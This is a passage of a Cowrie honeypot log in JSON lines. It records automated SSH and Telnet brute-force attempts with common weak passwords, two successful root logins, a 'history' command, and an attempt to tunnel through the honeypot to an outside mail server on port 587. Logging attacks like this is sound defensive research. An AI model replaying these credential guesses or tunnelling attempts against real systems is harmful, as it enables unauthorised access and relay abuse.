sa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:34:33.849111Z","src_ip":"212.227.125.160","session":"ac1ea1bef231"}
{"eventid":"cowrie.login.failed","username":"www","password":"12345678","message":"login attempt [www/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T14:34:34.589437Z","src_ip":"212.227.125.160","session":"ac1ea1bef231"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:34:35.757218Z","src_ip":"212.227.125.160","session":"ac1ea1bef231"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43090,"dst_ip":"1.2.3.4","dst_port":22,"session":"103b49510d3c","protocol":"ssh","message":"New connection: 212.227.125.160:43090 (1.2.3.4:22) [session: 103b49510d3c]","sensor":"my-vps","timestamp":"2025-08-28T14:35:12.377661Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:35:12.379539Z","src_ip":"212.227.125.160","session":"103b49510d3c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:35:12.545408Z","src_ip":"212.227.125.160","session":"103b49510d3c"}
{"eventid":"cowrie.login.failed","username":"www","password":"qwerty","message":"login attempt [www/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T14:35:13.194019Z","src_ip":"212.227.125.160","session":"103b49510d3c"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:35:14.361320Z","src_ip":"212.227.125.160","session":"103b49510d3c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46178,"dst_ip":"1.2.3.4","dst_port":22,"session":"a01e63962f8e","protocol":"ssh","message":"New connection: 212.227.125.160:46178 (1.2.3.4:22) [session: a01e63962f8e]","sensor":"my-vps","timestamp":"2025-08-28T14:35:49.118117Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:35:49.119276Z","src_ip":"212.227.125.160","session":"a01e63962f8e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:35:49.287096Z","src_ip":"212.227.125.160","session":"a01e63962f8e"}
{"eventid":"cowrie.login.failed","username":"www","password":"123123","message":"login attempt [www/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T14:35:49.794040Z","src_ip":"212.227.125.160","session":"a01e63962f8e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:35:50.964541Z","src_ip":"212.227.125.160","session":"a01e63962f8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":21860,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec4faa15b374","protocol":"ssh","message":"New connection: 212.227.125.160:21860 (1.2.3.4:22) [session: ec4faa15b374]","sensor":"my-vps","timestamp":"2025-08-28T14:35:57.107136Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58402,"dst_ip":"1.2.3.4","dst_port":22,"session":"cffde760040d","protocol":"ssh","message":"New connection: 212.227.125.160:58402 (1.2.3.4:22) [session: cffde760040d]","sensor":"my-vps","timestamp":"2025-08-28T14:36:14.332864Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:36:14.333739Z","src_ip":"212.227.125.160","session":"cffde760040d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49676,"dst_ip":"1.2.3.4","dst_port":22,"session":"299e9c5c1887","protocol":"ssh","message":"New connection: 212.227.125.160:49676 (1.2.3.4:22) [session: 299e9c5c1887]","sensor":"my-vps","timestamp":"2025-08-28T14:36:24.658254Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:36:24.794840Z","src_ip":"212.227.125.160","session":"299e9c5c1887"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:36:24.994158Z","src_ip":"212.227.125.160","session":"299e9c5c1887"}
{"eventid":"cowrie.login.failed","username":"www","password":"111111","message":"login attempt [www/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T14:36:27.578696Z","src_ip":"212.227.125.160","session":"299e9c5c1887"}
{"eventid":"cowrie.session.closed","duration":"14.0","message":"Connection lost after 14.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:36:28.333982Z","src_ip":"212.227.125.160","session":"cffde760040d"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:36:28.882222Z","src_ip":"212.227.125.160","session":"299e9c5c1887"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":21860,"dst_ip":"1.2.3.4","dst_port":23,"session":"d06ef6d39fe6","protocol":"telnet","message":"New connection: 212.227.125.160:21860 (1.2.3.4:23) [session: d06ef6d39fe6]","sensor":"my-vps","timestamp":"2025-08-28T14:36:53.970474Z"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":24831,"dst_ip":"1.2.3.4","dst_port":22,"session":"d03aee4530d6","protocol":"ssh","message":"New connection: 80.94.95.15:24831 (1.2.3.4:22) [session: d03aee4530d6]","sensor":"my-vps","timestamp":"2025-08-28T14:36:56.919679Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T14:36:56.920408Z","src_ip":"80.94.95.15","session":"d03aee4530d6"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T14:36:56.971910Z","src_ip":"80.94.95.15","session":"d03aee4530d6"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:36:57.305574Z","src_ip":"80.94.95.15","session":"d03aee4530d6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"80.94.95.15","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-28T14:36:57.361560Z","session":"d03aee4530d6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-28T14:36:57.436325Z","src_ip":"80.94.95.15","session":"d03aee4530d6"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:36:57.516321Z","src_ip":"80.94.95.15","session":"d03aee4530d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58478,"dst_ip":"1.2.3.4","dst_port":22,"session":"6672cd6cd73a","protocol":"ssh","message":"New connection: 212.227.125.160:58478 (1.2.3.4:22) [session: 6672cd6cd73a]","sensor":"my-vps","timestamp":"2025-08-28T14:37:01.128507Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:37:01.129426Z","src_ip":"212.227.125.160","session":"6672cd6cd73a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:37:01.298480Z","src_ip":"212.227.125.160","session":"6672cd6cd73a"}
{"eventid":"cowrie.login.failed","username":"www","password":"1234567","message":"login attempt [www/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T14:37:01.875221Z","src_ip":"212.227.125.160","session":"6672cd6cd73a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48390,"dst_ip":"1.2.3.4","dst_port":23,"session":"6892b9aef3ae","protocol":"telnet","message":"New connection: 212.227.125.160:48390 (1.2.3.4:23) [session: 6892b9aef3ae]","sensor":"my-vps","timestamp":"2025-08-28T14:37:03.031348Z"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:37:03.047342Z","src_ip":"212.227.125.160","session":"6672cd6cd73a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55340,"dst_ip":"1.2.3.4","dst_port":23,"session":"72b9fa268224","protocol":"telnet","message":"New connection: 212.227.125.160:55340 (1.2.3.4:23) [session: 72b9fa268224]","sensor":"my-vps","timestamp":"2025-08-28T14:37:05.968409Z"}
{"eventid":"cowrie.session.closed","duration":14.106168031692505,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:37:20.074508Z","src_ip":"212.227.125.160","session":"72b9fa268224"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39241,"dst_ip":"1.2.3.4","dst_port":22,"session":"92193de2b1ae","protocol":"ssh","message":"New connection: 212.227.235.229:39241 (1.2.3.4:22) [session: 92193de2b1ae]","sensor":"my-vps","timestamp":"2025-08-28T14:37:38.980364Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:37:39.034286Z","src_ip":"212.227.235.229","session":"92193de2b1ae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T14:37:39.308097Z","src_ip":"212.227.235.229","session":"92193de2b1ae"}
{"eventid":"cowrie.login.success","username":"root","password":"100851","message":"login attempt [root/100851] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:37:41.441963Z","src_ip":"212.227.235.229","session":"92193de2b1ae"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:37:42.360033Z","src_ip":"212.227.235.229","session":"92193de2b1ae"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-28T14:37:42.360938Z","src_ip":"212.227.235.229","session":"92193de2b1ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8222,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bf17b3b0c0d","protocol":"ssh","message":"New connection: 212.227.235.229:8222 (1.2.3.4:22) [session: 9bf17b3b0c0d]","sensor":"my-vps","timestamp":"2025-08-28T14:37:42.508625Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T14:37:42.509649Z","src_ip":"212.227.235.229","session":"9bf17b3b0c0d"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T14:37:42.613962Z","src_ip":"212.227.235.229","session":"9bf17b3b0c0d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:37:42.735773Z","src_ip":"212.227.235.229","session":"92193de2b1ae"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:37:42.827047Z","src_ip":"212.227.235.229","session":"92193de2b1ae"}
{"eventid":"cowrie.login.failed","username":"admin","password":"31031981","message":"login attempt [admin/31031981] failed","sensor":"my-vps","timestamp":"2025-08-28T14:37:43.115124Z","src_ip":"212.227.235.229","session":"9bf17b3b0c0d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"30111984","message":"login attempt [admin/30111984] failed","sensor":"my-vps","timestamp":"2025-08-28T14:37:44.222482Z","src_ip":"212.227.235.229","session":"9bf17b3b0c0d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"30101989","message":"login attempt [admin/30101989] failed","sensor":"my-vps","timestamp":"2025-08-28T14:37:45.329774Z","src_ip":"212.227.235.229","session":"9bf17b3b0c0d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"30081991","message":"login attempt [admin/30081991] failed","sensor":"my-vps","timestamp":"2025-08-28T14:37:46.437622Z","src_ip":"212.227.235.229","session":"9bf17b3b0c0d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"30011976","message":"login attempt [admin/30011976] failed","sensor":"my-vps","timestamp":"2025-08-28T14:37:47.545855Z","src_ip":"212.227.235.229","session":"9bf17b3b0c0d"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:37:48.652448Z","src_ip":"212.227.235.229","session":"9bf17b3b0c0d"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:37:57.117798Z","src_ip":"212.227.125.160","session":"ec4faa15b374"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.27.234","src_port":54588,"dst_ip":"1.2.3.4","dst_port":23,"session":"49f784059356","protocol":"telnet","message":"New connection: 139.59.27.234:54588 (1.2.3.4:23) [session: 49f784059356]","sensor":"my-vps","timestamp":"2025-08-28T14:38:12.679104Z"}
{"eventid":"cowrie.session.closed","duration":5.806283235549927,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:38:18.485312Z","src_ip":"139.59.27.234","session":"49f784059356"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.27.234","src_port":44774,"dst_ip":"1.2.3.4","dst_port":23,"session":"8307b4143dca","protocol":"telnet","message":"New connection: 139.59.27.234:44774 (1.2.3.4:23) [session: 8307b4143dca]","sensor":"my-vps","timestamp":"2025-08-28T14:38:18.758125Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":65105,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0b0515d672d","protocol":"ssh","message":"New connection: 212.227.125.160:65105 (1.2.3.4:22) [session: d0b0515d672d]","sensor":"my-vps","timestamp":"2025-08-28T14:38:19.316744Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:38:19.374785Z","src_ip":"212.227.125.160","session":"d0b0515d672d"}
{"eventid":"cowrie.session.closed","duration":1.2474086284637451,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:38:20.005455Z","src_ip":"139.59.27.234","session":"8307b4143dca"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.27.234","src_port":44788,"dst_ip":"1.2.3.4","dst_port":23,"session":"8b4b1196894b","protocol":"telnet","message":"New connection: 139.59.27.234:44788 (1.2.3.4:23) [session: 8b4b1196894b]","sensor":"my-vps","timestamp":"2025-08-28T14:38:20.258739Z"}
{"eventid":"cowrie.session.closed","duration":1.2850656509399414,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:38:21.543704Z","src_ip":"139.59.27.234","session":"8b4b1196894b"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.27.234","src_port":44794,"dst_ip":"1.2.3.4","dst_port":23,"session":"89e1eb601dbc","protocol":"telnet","message":"New connection: 139.59.27.234:44794 (1.2.3.4:23) [session: 89e1eb601dbc]","sensor":"my-vps","timestamp":"2025-08-28T14:38:21.804003Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T14:38:22.411220Z","src_ip":"139.59.27.234","session":"89e1eb601dbc"}
{"eventid":"cowrie.session.closed","duration":2.7625362873077393,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:38:24.566464Z","src_ip":"139.59.27.234","session":"89e1eb601dbc"}
